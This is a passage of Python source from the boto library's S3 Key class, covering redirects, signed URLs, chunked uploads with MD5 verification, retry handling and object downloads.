return self.bucket.set_canned_acl(acl_str, self.name, headers)
def get_redirect(self):
"""Return the redirect location configured for this key.
If no redirect is configured (via set_redirect), then None
will be returned.
"""
response = self.bucket.connection.make_request(
'HEAD', self.bucket.name, self.name)
if response.status == 200:
return response.getheader('x-amz-website-redirect-location')
else:
raise self.provider.storage_response_error(
response.status, response.reason, response.read())
def set_redirect(self, redirect_location, headers=None):
"""Configure this key to redirect to another location.
When the bucket associated with this key is accessed from the website
endpoint, a 301 redirect will be issued to the specified
`redirect_location`.
:type redirect_location: string
:param redirect_location: The location to redirect.
"""
if headers is None:
headers = {}
else:
headers = headers.copy()
headers['x-amz-website-redirect-location'] = redirect_location
response = self.bucket.connection.make_request('PUT', self.bucket.name,
self.name, headers)
if response.status == 200:
return True
else:
raise self.provider.storage_response_error(
response.status, response.reason, response.read())
def make_public(self, headers=None):
return self.bucket.set_canned_acl('public-read', self.name, headers)
def generate_url(self, expires_in, method='GET', headers=None,
query_auth=True, force_http=False, response_headers=None,
expires_in_absolute=False, version_id=None,
policy=None, reduced_redundancy=False, encrypt_key=False):
"""
Generate a URL to access this key.
:type expires_in: int
:param expires_in: How long the url is valid for, in seconds.
:type method: string
:param method: The method to use for retrieving the file
(default is GET).
:type headers: dict
:param headers: Any headers to pass along in the request.
:type query_auth: bool
:param query_auth: If True, signs the request in the URL.
:type force_http: bool
:param force_http: If True, http will be used instead of https.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type expires_in_absolute: bool
:param expires_in_absolute:
:type version_id: string
:param version_id: The version_id of the object to GET. If specified
this overrides any value in the key.
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
Redundancy Storage (RRS) feature of S3, provides lower
redundancy at lower storage cost.
:type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object will
be encrypted on the server-side by S3 and will be stored
in an encrypted form while at rest in S3.
:rtype: string
:return: The URL to access the key
"""
provider = self.bucket.connection.provider
version_id = version_id or self.version_id
if headers is None:
headers = {}
else:
headers = headers.copy()
# add headers accordingly (usually PUT case)
if policy:
headers[provider.acl_header] = policy
if reduced_redundancy:
self.storage_class = 'REDUCED_REDUNDANCY'
if provider.storage_class_header:
headers[provider.storage_class_header] = self.storage_class
if encrypt_key:
headers[provider.server_side_encryption_header] = 'AES256'
headers = boto.utils.merge_meta(headers, self.metadata, provider)
return self.bucket.connection.generate_url(expires_in, method,
self.bucket.name, self.name,
headers, query_auth,
force_http,
response_headers,
expires_in_absolute,
version_id)
def send_file(self, fp, headers=None, cb=None, num_cb=10,
query_args=None, chunked_transfer=False, size=None):
"""
Upload a file to a key into a bucket on S3.
:type fp: file
:param fp: The file pointer to upload. The file pointer must
point point at the offset from which you wish to upload.
ie. if uploading the full file, it should point at the
start of the file. Normally when a file is opened for
reading, the fp will point at the first byte. See the
bytes parameter below for more info.
:type headers: dict
:param headers: The headers to pass along with the PUT request
:type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file
transfer. Providing a negative integer will cause your
callback to be called with each buffer read.
:type query_args: string
:param query_args: (optional) Arguments to pass in the query string.
:type chunked_transfer: boolean
:param chunked_transfer: (optional) If true, we use chunked
Transfer-Encoding.
:type size: int
:param size: (optional) The Maximum number of bytes to read
from the file pointer (fp). This is useful when uploading
a file in multiple parts where you are splitting the file
up into different ranges to be uploaded. If not specified,
the default behaviour is to read all bytes from the file
pointer. Less bytes may be available.
"""
self._send_file_internal(fp, headers=headers, cb=cb, num_cb=num_cb,
query_args=query_args,
chunked_transfer=chunked_transfer, size=size)
def _send_file_internal(self, fp, headers=None, cb=None, num_cb=10,
query_args=None, chunked_transfer=False, size=None,
hash_algs=None):
provider = self.bucket.connection.provider
try:
spos = fp.tell()
except IOError:
spos = None
self.read_from_stream = False
# If hash_algs is unset and the MD5 hasn't already been computed,
# default to an MD5 hash_alg to hash the data on-the-fly.
if hash_algs is None and not self.md5:
hash_algs = {'md5': md5}
digesters = dict((alg, hash_algs[alg]()) for alg in hash_algs or {})
def sender(http_conn, method, path, data, headers):
# This function is called repeatedly for temporary retries
# so we must be sure the file pointer is pointing at the
# start of the data.
if spos is not None and spos != fp.tell():
fp.seek(spos)
elif spos is None and self.read_from_stream:
# if seek is not supported, and we've read from this
# stream already, then we need to abort retries to
# avoid setting bad data.
raise provider.storage_data_error(
'Cannot retry failed request. fp does not support seeking.')
# If the caller explicitly specified host header, tell putrequest
# not to add a second host header. Similarly for accept-encoding.
skips = {}
if boto.utils.find_matching_headers('host', headers):
skips['skip_host'] = 1
if boto.utils.find_matching_headers('accept-encoding', headers):
skips['skip_accept_encoding'] = 1
http_conn.putrequest(method, path, **skips)
for key in headers:
http_conn.putheader(key, headers[key])
http_conn.endheaders()
save_debug = self.bucket.connection.debug
self.bucket.connection.debug = 0
# If the debuglevel < 4 we don't want to show connection
# payload, so turn off HTTP connection-level debug output (to
# be restored below).
# Use the getattr approach to allow this to work in AppEngine.
if getattr(http_conn, 'debuglevel', 0) < 4:
http_conn.set_debuglevel(0)
data_len = 0
if cb:
if size:
cb_size = size
elif self.size:
cb_size = self.size
else:
cb_size = 0
if chunked_transfer and cb_size == 0:
# For chunked Transfer, we call the cb for every 1MB
# of data transferred, except when we know size.
cb_count = (1024 * 1024) / self.BufferSize
elif num_cb > 1:
cb_count = int(
math.ceil(cb_size / self.BufferSize / (num_cb - 1.0)))
elif num_cb < 0:
cb_count = -1
else:
cb_count = 0
i = 0
cb(data_len, cb_size)
bytes_togo = size
if bytes_togo and bytes_togo < self.BufferSize:
chunk = fp.read(bytes_togo)
else:
chunk = fp.read(self.BufferSize)
if not isinstance(chunk, bytes):
chunk = chunk.encode('utf-8')
if spos is None:
# read at least something from a non-seekable fp.
self.read_from_stream = True
while chunk:
chunk_len = len(chunk)
data_len += chunk_len
if chunked_transfer:
http_conn.send('%x;\r\n' % chunk_len)
http_conn.send(chunk)
http_conn.send('\r\n')
else:
http_conn.send(chunk)
for alg in digesters:
digesters[alg].update(chunk)
if bytes_togo:
bytes_togo -= chunk_len
if bytes_togo <= 0:
break
if cb:
i += 1
if i == cb_count or cb_count == -1:
cb(data_len, cb_size)
i = 0
if bytes_togo and bytes_togo < self.BufferSize:
chunk = fp.read(bytes_togo)
else:
chunk = fp.read(self.BufferSize)
if not isinstance(chunk, bytes):
chunk = chunk.encode('utf-8')
self.size = data_len
for alg in digesters:
self.local_hashes[alg] = digesters[alg].digest()
if chunked_transfer:
http_conn.send('0\r\n')
# http_conn.send("Content-MD5: %s\r\n" % self.base64md5)
http_conn.send('\r\n')
if cb and (cb_count <= 1 or i > 0) and data_len > 0:
cb(data_len, cb_size)
http_conn.set_debuglevel(save_debug)
self.bucket.connection.debug = save_debug
response = http_conn.getresponse()
body = response.read()
if not self.should_retry(response, chunked_transfer):
raise provider.storage_response_error(
response.status, response.reason, body)
return response
if not headers:
headers = {}
else:
headers = headers.copy()
# Overwrite user-supplied user-agent.
for header in find_matching_headers('User-Agent', headers):
del headers[header]
headers['User-Agent'] = UserAgent
# If storage_class is None, then a user has not explicitly requested
# a storage class, so we can assume STANDARD here
if self._storage_class not in [None, 'STANDARD']:
headers[provider.storage_class_header] = self.storage_class
if find_matching_headers('Content-Encoding', headers):
self.content_encoding = merge_headers_by_name(
'Content-Encoding', headers)
if find_matching_headers('Content-Language', headers):
self.content_language = merge_headers_by_name(
'Content-Language', headers)
content_type_headers = find_matching_headers('Content-Type', headers)
if content_type_headers:
# Some use cases need to suppress sending of the Content-Type
# header and depend on the receiving server to set the content
# type. This can be achieved by setting headers['Content-Type']
# to None when calling this method.
if (len(content_type_headers) == 1 and
headers[content_type_headers[0]] is None):
# Delete null Content-Type value to skip sending that header.
del headers[content_type_headers[0]]
else:
self.content_type = merge_headers_by_name(
'Content-Type', headers)
elif self.path:
self.content_type = mimetypes.guess_type(self.path)[0]
if self.content_type is None:
self.content_type = self.DefaultContentType
headers['Content-Type'] = self.content_type
else:
headers['Content-Type'] = self.content_type
if self.base64md5:
headers['Content-MD5'] = self.base64md5
if chunked_transfer:
headers['Transfer-Encoding'] = 'chunked'
#if not self.base64md5:
# headers['Trailer'] = "Content-MD5"
else:
headers['Content-Length'] = str(self.size)
# This is terrible. We need a SHA256 of the body for SigV4, but to do
# the chunked ``sender`` behavior above, the ``fp`` isn't available to
# the auth mechanism (because closures). Detect if it's SigV4 & embelish
# while we can before the auth calculations occur.
if 'hmac-v4-s3' in self.bucket.connection._required_auth_capability():
kwargs = {'fp': fp, 'hash_algorithm': hashlib.sha256}
if size is not None:
kwargs['size'] = size
headers['_sha256'] = compute_hash(**kwargs)[0]
headers['Expect'] = '100-Continue'
headers = boto.utils.merge_meta(headers, self.metadata, provider)
resp = self.bucket.connection.make_request(
'PUT',
self.bucket.name,
self.name,
headers,
sender=sender,
query_args=query_args
)
self.handle_version_headers(resp, force=True)
self.handle_addl_headers(resp.getheaders())
def should_retry(self, response, chunked_transfer=False):
provider = self.bucket.connection.provider
if not chunked_transfer:
if response.status in [500, 503]:
# 500 & 503 can be plain retries.
return True
if response.getheader('location'):
# If there's a redirect, plain retry.
return True
if 200 <= response.status <= 299:
self.etag = response.getheader('etag')
md5 = self.md5
if isinstance(md5, bytes):
md5 = md5.decode('utf-8')
# If you use customer-provided encryption keys, the ETag value that
# Amazon S3 returns in the response will not be the MD5 of the
# object.
server_side_encryption_customer_algorithm = response.getheader(
'x-amz-server-side-encryption-customer-algorithm', None)
if server_side_encryption_customer_algorithm is None:
if self.etag != '"%s"' % md5:
raise provider.storage_data_error(
'ETag from S3 did not match computed MD5. '
'%s vs. %s' % (self.etag, self.md5))
return True
if response.status == 400:
# The 400 must be trapped so the retry handler can check to
# see if it was a timeout.
# If ``RequestTimeout`` is present, we'll retry. Otherwise, bomb
# out.
body = response.read()
err = provider.storage_response_error(
response.status,
response.reason,
body
)
if err.error_code in ['RequestTimeout']:
raise PleaseRetryException(
"Saw %s, retrying" % err.error_code,
response=response
)
return False
def compute_md5(self, fp, size=None):
"""
:type fp: file
:param fp: File pointer to the file to MD5 hash. The file
pointer will be reset to the same position before the
method returns.
:type size: int
:param size: (optional) The Maximum number of bytes to read
from the file pointer (fp). This is useful when uploading
a file in multiple parts where the file is being split
in place into different parts. Less bytes may be available.
"""
hex_digest, b64_digest, data_size = compute_md5(fp, size=size)
# Returned values are MD5 hash, base64 encoded MD5 hash, and data size.
# The internal implementation of compute_md5() needs to return the
# data size but we don't want to return that value to the external
# caller because it changes the class interface (i.e. it might
# break some code) so we consume the third tuple value here and
# return the remainder of the tuple to the caller, thereby preserving
# the existing interface.
self.size = data_size
return (hex_digest, b64_digest)
def set_contents_from_stream(self, fp, headers=None, replace=True,
cb=None, num_cb=10, policy=None,
reduced_redundancy=False, query_args=None,
size=None):
"""
Store an object using the name of the Key object as the key in
cloud and the contents of the data stream pointed to by 'fp' as
the contents.
The stream object is not seekable and total size is not known.
This has the implication that we can't specify the
Content-Size and Content-MD5 in the header. So for huge
uploads, the delay in calculating MD5 is avoided but with a
penalty of inability to verify the integrity of the uploaded
data.
:type fp: file
:param fp: the file whose contents are to be uploaded
:type headers: dict
:param headers: additional HTTP headers to be sent with the
PUT request.
:type replace: bool
:param replace: If this parameter is False, the method will first check
to see if an object exists in the bucket with the same key. If it
does, it won't overwrite it. The default value is True which will
overwrite the object.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two integer
parameters, the first representing the number of bytes that have
been successfully transmitted to GS and the second representing the
total number of bytes that need to be transmitted.
:type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter, this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type policy: :class:`boto.gs.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the new key
in GS.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
Redundancy Storage (RRS) feature of S3, provides lower
redundancy at lower storage cost.
:type size: int
:param size: (optional) The Maximum number of bytes to read from
the file pointer (fp). This is useful when uploading a
file in multiple parts where you are splitting the file up
into different ranges to be uploaded. If not specified,
the default behaviour is to read all bytes from the file
pointer. Less bytes may be available.
"""
provider = self.bucket.connection.provider
if not provider.supports_chunked_transfer():
raise BotoClientError('%s does not support chunked transfer'
% provider.get_provider_name())
# Name of the Object should be specified explicitly for Streams.
if not self.name or self.name == '':
raise BotoClientError('Cannot determine the destination '
'object name for the given stream')
if headers is None:
headers = {}
if policy:
headers[provider.acl_header] = policy
if reduced_redundancy:
self.storage_class = 'REDUCED_REDUNDANCY'
if provider.storage_class_header:
headers[provider.storage_class_header] = self.storage_class
if self.bucket is not None:
if not replace:
if self.bucket.lookup(self.name):
return
self.send_file(fp, headers, cb, num_cb, query_args,
chunked_transfer=True, size=size)
def set_contents_from_file(self, fp, headers=None, replace=True,
cb=None, num_cb=10, policy=None, md5=None,
reduced_redundancy=False, query_args=None,
encrypt_key=False, size=None, rewind=False):
"""
Store an object in S3 using the name of the Key object as the
key in S3 and the contents of the file pointed to by 'fp' as the
contents. The data is read from 'fp' from its current position until
'size' bytes have been read or EOF.
:type fp: file
:param fp: the file whose contents to upload
:type headers: dict
:param headers: Additional HTTP headers that will be sent with
the PUT request.
:type replace: bool
:param replace: If this parameter is False, the method will
first check to see if an object exists in the bucket with
the same key. If it does, it won't overwrite it. The
default value is True which will overwrite the object.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
:type md5: A tuple containing the hexdigest version of the MD5
checksum of the file as the first element and the
Base64-encoded version of the plain checksum as the second
element. This is the same format returned by the
compute_md5 method.
:param md5: If you need to compute the MD5 for any reason
prior to upload, it's silly to have to do it twice so this
param, if present, will be used as the MD5 values of the
file. Otherwise, the checksum will be computed.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
Redundancy Storage (RRS) feature of S3, provides lower
redundancy at lower storage cost.
:type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object will
be encrypted on the server-side by S3 and will be stored
in an encrypted form while at rest in S3.
:type size: int
:param size: (optional) The Maximum number of bytes to read
from the file pointer (fp). This is useful when uploading
a file in multiple parts where you are splitting the file
up into different ranges to be uploaded. If not specified,
the default behaviour is to read all bytes from the file
pointer. Less bytes may be available.
:type rewind: bool
:param rewind: (optional) If True, the file pointer (fp) will
be rewound to the start before any bytes are read from
it. The default behaviour is False which reads from the
current position of the file pointer (fp).
:rtype: int
:return: The number of bytes written to the key.
"""
provider = self.bucket.connection.provider
headers = headers or {}
if policy:
headers[provider.acl_header] = policy
if encrypt_key:
headers[provider.server_side_encryption_header] = 'AES256'
if rewind:
# caller requests reading from beginning of fp.
fp.seek(0, os.SEEK_SET)
else:
# The following seek/tell/seek logic is intended
# to detect applications using the older interface to
# set_contents_from_file(), which automatically rewound the
# file each time the Key was reused. This changed with commit
# 14ee2d03f4665fe20d19a85286f78d39d924237e, to support uploads
# split into multiple parts and uploaded in parallel, and at
# the time of that commit this check was added because otherwise
# older programs would get a success status and upload an empty
# object. Unfortuantely, it's very inefficient for fp's implemented
# by KeyFile (used, for example, by gsutil when copying between
# providers). So, we skip the check for the KeyFile case.
# TODO: At some point consider removing this seek/tell/seek
# logic, after enough time has passed that it's unlikely any
# programs remain that assume the older auto-rewind interface.
if not isinstance(fp, KeyFile):
spos = fp.tell()
fp.seek(0, os.SEEK_END)
if fp.tell() == spos:
fp.seek(0, os.SEEK_SET)
if fp.tell() != spos:
# Raise an exception as this is likely a programming
# error whereby there is data before the fp but nothing
# after it.
fp.seek(spos)
raise AttributeError('fp is at EOF. Use rewind option '
'or seek() to data start.')
# seek back to the correct position.
fp.seek(spos)
if reduced_redundancy:
self.storage_class = 'REDUCED_REDUNDANCY'
if provider.storage_class_header:
headers[provider.storage_class_header] = self.storage_class
# TODO - What if provider doesn't support reduced reduncancy?
# What if different providers provide different classes?
if hasattr(fp, 'name'):
self.path = fp.name
if self.bucket is not None:
if not md5 and provider.supports_chunked_transfer():
# defer md5 calculation to on the fly and
# we don't know anything about size yet.
chunked_transfer = True
self.size = None
else:
chunked_transfer = False
if isinstance(fp, KeyFile):
# Avoid EOF seek for KeyFile case as it's very inefficient.
key = fp.getkey()
size = key.size - fp.tell()
self.size = size
# At present both GCS and S3 use MD5 for the etag for
# non-multipart-uploaded objects. If the etag is 32 hex
# chars use it as an MD5, to avoid having to read the file
# twice while transferring.
if (re.match('^"[a-fA-F0-9]{32}"$', key.etag)):
etag = key.etag.strip('"')
md5 = (etag, base64.b64encode(binascii.unhexlify(etag)))
if not md5:
# compute_md5() and also set self.size to actual
# size of the bytes read computing the md5.
md5 = self.compute_md5(fp, size)
# adjust size if required
size = self.size
elif size:
self.size = size
else:
# If md5 is provided, still need to size so
# calculate based on bytes to end of content
spos = fp.tell()
fp.seek(0, os.SEEK_END)
self.size = fp.tell() - spos
fp.seek(spos)
size = self.size
self.md5 = md5[0]
self.base64md5 = md5[1]
if self.name is None:
self.name = self.md5
if not replace:
if self.bucket.lookup(self.name):
return
self.send_file(fp, headers=headers, cb=cb, num_cb=num_cb,
query_args=query_args,
chunked_transfer=chunked_transfer, size=size)
# return number of bytes written.
return self.size
def set_contents_from_filename(self, filename, headers=None, replace=True,
cb=None, num_cb=10, policy=None, md5=None,
reduced_redundancy=False,
encrypt_key=False):
"""
Store an object in S3 using the name of the Key object as the
key in S3 and the contents of the file named by 'filename'.
See set_contents_from_file method for details about the
parameters.
:type filename: string
:param filename: The name of the file that you want to put onto S3
:type headers: dict
:param headers: Additional headers to pass along with the
request to AWS.
:type replace: bool
:param replace: If True, replaces the contents of the file
if it already exists.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
:type md5: A tuple containing the hexdigest version of the MD5
checksum of the file as the first element and the
Base64-encoded version of the plain checksum as the second
element. This is the same format returned by the
compute_md5 method.
:param md5: If you need to compute the MD5 for any reason
prior to upload, it's silly to have to do it twice so this
param, if present, will be used as the MD5 values of the
file. Otherwise, the checksum will be computed.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
Redundancy Storage (RRS) feature of S3, provides lower
redundancy at lower storage cost. :type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object
will be encrypted on the server-side by S3 and will be
stored in an encrypted form while at rest in S3.
:rtype: int
:return: The number of bytes written to the key.
"""
with open(filename, 'rb') as fp:
return self.set_contents_from_file(fp, headers, replace, cb,
num_cb, policy, md5,
reduced_redundancy,
encrypt_key=encrypt_key)
def set_contents_from_string(self, string_data, headers=None, replace=True,
cb=None, num_cb=10, policy=None, md5=None,
reduced_redundancy=False,
encrypt_key=False):
"""
Store an object in S3 using the name of the Key object as the
key in S3 and the string 's' as the contents.
See set_contents_from_file method for details about the
parameters.
:type headers: dict
:param headers: Additional headers to pass along with the
request to AWS.
:type replace: bool
:param replace: If True, replaces the contents of the file if
it already exists.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
:type md5: A tuple containing the hexdigest version of the MD5
checksum of the file as the first element and the
Base64-encoded version of the plain checksum as the second
element. This is the same format returned by the
compute_md5 method.
:param md5: If you need to compute the MD5 for any reason
prior to upload, it's silly to have to do it twice so this
param, if present, will be used as the MD5 values of the
file. Otherwise, the checksum will be computed.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
Redundancy Storage (RRS) feature of S3, provides lower
redundancy at lower storage cost.
:type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object will
be encrypted on the server-side by S3 and will be stored
in an encrypted form while at rest in S3.
"""
if not isinstance(string_data, bytes):
string_data = string_data.encode("utf-8")
fp = BytesIO(string_data)
r = self.set_contents_from_file(fp, headers, replace, cb, num_cb,
policy, md5, reduced_redundancy,
encrypt_key=encrypt_key)
fp.close()
return r
def get_file(self, fp, headers=None, cb=None, num_cb=10,
torrent=False, version_id=None, override_num_retries=None,
response_headers=None):
"""
Retrieves a file from an S3 Key
:type fp: file
:param fp: File pointer to put the data into
:type headers: string
:param: headers to send when retrieving the files
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type torrent: bool
:param torrent: Flag for whether to get a torrent for the file
:type override_num_retries: int
:param override_num_retries: If not None will override configured
num_retries parameter for underlying GET.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type version_id: str
:param version_id: The ID of a particular version of the object.
If this parameter is not supplied but the Key object has
a ``version_id`` attribute, that value will be used when
retrieving the object. You can set the Key object's
``version_id`` attribute to None to always grab the latest
version from a version-enabled bucket.
"""
self._get_file_internal(fp, headers=headers, cb=cb, num_cb=num_cb,
torrent=torrent, version_id=version_id,
override_num_retries=override_num_retries,
response_headers=response_headers,
hash_algs=None,
query_args=None)
def _get_file_internal(self, fp, headers=None, cb=None, num_cb=10,
torrent=False, version_id=None, override_num_retries=None,
response_headers=None, hash_algs=None, query_args=None):
if headers is None:
headers = {}
save_debug = self.bucket.connection.debug
if self.bucket.connection.debug == 1:
self.bucket.connection.debug = 0
query_args = query_args or []
if torrent:
query_args.append('torrent')
if hash_algs is None and not torrent:
hash_algs = {'md5': md5}
digesters = dict((alg, hash_algs[alg]()) for alg in hash_algs or {})
# If a version_id is passed in, use that. If not, check to see
# if the Key object has an explicit version_id and, if so, use that.
# Otherwise, don't pass a version_id query param.
if version_id is None:
version_id = self.version_id
if version_id:
query_args.append('versionId=%s' % version_id)
if response_headers:
for key in response_headers:
query_args.append('%s=%s' % (
key, urllib.parse.quote(response_headers[key])))
query_args = '&'.join(query_args)
self.open('r', headers, query_args=query_args,
override_num_retries=override_num_retries)
data_len = 0
if cb:
if self.size is None:
cb_size = 0
else:
cb_size = self.size
if self.size is None and num_cb != -1:
# If size is not available due to chunked transfer for example,
# we'll call the cb for every 1MB of data transferred.
cb_count = (1024 * 1024) / self.BufferSize
elif num_cb > 1:
cb_count = int(math.ceil(cb_size/self.BufferSize/(num_cb-1.0)))
elif num_cb < 0:
cb_count = -1
else:
cb_count = 0
i = 0
cb(data_len, cb_size)
try:
for bytes in self:
fp.write(bytes)
data_len += len(bytes)
for alg in digesters:
digesters[alg].update(bytes)
if cb:
if cb_size > 0 and data_len >= cb_size:
break
i += 1
if i == cb_count or cb_count == -1:
cb(data_len, cb_size)
i = 0
except IOError as e:
if e.errno == errno.ENOSPC:
raise StorageDataError('Out of space for destination file '
'%s' % fp.name)
raise
if cb and (cb_count <= 1 or i > 0) and data_len > 0:
cb(data_len, cb_size)
for alg in digesters:
self.local_hashes[alg] = digesters[alg].digest()
if self.size is None and not torrent and "Range" not in headers:
self.size = data_len
self.close()
self.bucket.connection.debug = save_debug
def get_torrent_file(self, fp, headers=None, cb=None, num_cb=10):
"""
Get a torrent file (see to get_file)
:type fp: file
:param fp: The file pointer of where to put the torrent
:type headers: dict
:param headers: Headers to be passed
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
"""
return self.get_file(fp, headers, cb, num_cb, torrent=True)
def get_contents_to_file(self, fp, headers=None,
cb=None, num_cb=10,
torrent=False,
version_id=None,
res_download_handler=None,
response_headers=None):
"""
Retrieve an object from S3 using the name of the Key object as the
key in S3. Write the contents of the object to the file pointed
to by 'fp'.
:type fp: File -like object
:param fp:
:type headers: dict
:param headers: additional HTTP headers that will be sent with
the GET request.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type torrent: bool
:param torrent: If True, returns the contents of a torrent
file as a string.
:type res_upload_handler: ResumableDownloadHandler
:param res_download_handler: If provided, this handler will
perform the download.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type version_id: str
:param version_id: The ID of a particular version of the object.
If this parameter is not supplied but the Key object has
a ``version_id`` attribute, that value will be used when
retrieving the object. You can set the Key object's
``version_id`` attribute to None to always grab the latest
version from a version-enabled bucket.
"""
if self.bucket is not None:
if res_download_handler:
res_download_handler.get_file(self, fp, headers, cb, num_cb,
torrent=torrent,
version_id=version_id)
else:
self.get_file(fp, headers, cb, num_cb, torrent=torrent,
version_id=version_id,
response_headers=response_headers)
def get_contents_to_filename(self, filename, headers=None,
cb=None, num_cb=10,
torrent=False,
version_id=None,
res_download_handler=None,
response_headers=None):
"""
Retrieve an object from S3 using the name of the Key object as the
key in S3. Store contents of the object to a file named by 'filename'.
See get_contents_to_file method for details about the
parameters.
:type filename: string
:param filename: The filename of where to put the file contents
:type headers: dict
:param headers: Any additional headers to send in the request
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type torrent: bool
:param torrent: If True, returns the contents of a torrent file
as a string.
:type res_upload_handler: ResumableDownloadHandler
:param res_download_handler: If provided, this handler will
perform the download.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type version_id: str
:param version_id: The ID of a particular version of the object.
If this parameter is not supplied but the Key object has
a ``version_id`` attribute, that value will be used when
retrieving the object. You can set the Key object's
``version_id`` attribute to None to always grab the latest
version from a version-enabled bucket.
"""
try:
with open(filename, 'wb') as fp:
self.get_contents_to_file(fp, headers, cb, num_cb,
torrent=torrent,
version_id=version_id,
res_download_handler=res_download_handler,
response_headers=response_headers)
except Exception:
os.remove(filename)
raise
# if last_modified date was sent from s3, try to set file's timestamp
if self.last_modified is not None:
try:
modified_tuple = email.utils.parsedate_tz(self.last_modified)
modified_stamp = int(email.utils.mktime_tz(modified_tuple))
os.utime(fp.name, (modified_stamp, modified_stamp))
except Exception:
pass
def get_contents_as_string(self, headers=None,
cb=None, num_cb=10,
torrent=False,
version_id=None,
response_headers=None, encoding=None):
"""
Retrieve an object from S3 using the name of the Key object as the
key in S3. Return the contents of the object as a string.
See get_contents_to_file method for details about the
parameters.
:type headers: dict
:param headers: Any additional headers to send in the request
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type torrent: bool
:param torrent: If True, returns the contents of a torrent file
as a string.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type version_id: str
:param version_id: The ID of a particular version of the object.
If this parameter is not supplied but the Key object has
a ``version_id`` attribute, that value will be used when
retrieving the object. You can set the Key object's
``version_id`` attribute to None to always grab the latest
version from a version-enabled bucket.
:type encoding: str
:param encoding: The text encoding to use, such as ``utf-8``
or ``iso-8859-1``. If set, then a string will be returned.
Defaults to ``None`` and returns bytes.
:rtype: bytes or str
:returns: The contents of the file as bytes or a string
"""
fp = BytesIO()
self.get_contents_to_file(fp, headers, cb, num_cb, torrent=torrent,
version_id=version_id,
response_headers=response_headers)
value = fp.getvalue()
if encoding is not None:
value = value.decode(encoding)
return value
def add_email_grant(self, permission, email_address, headers=None):
"""
Convenience method that provides a quick way to add an email grant
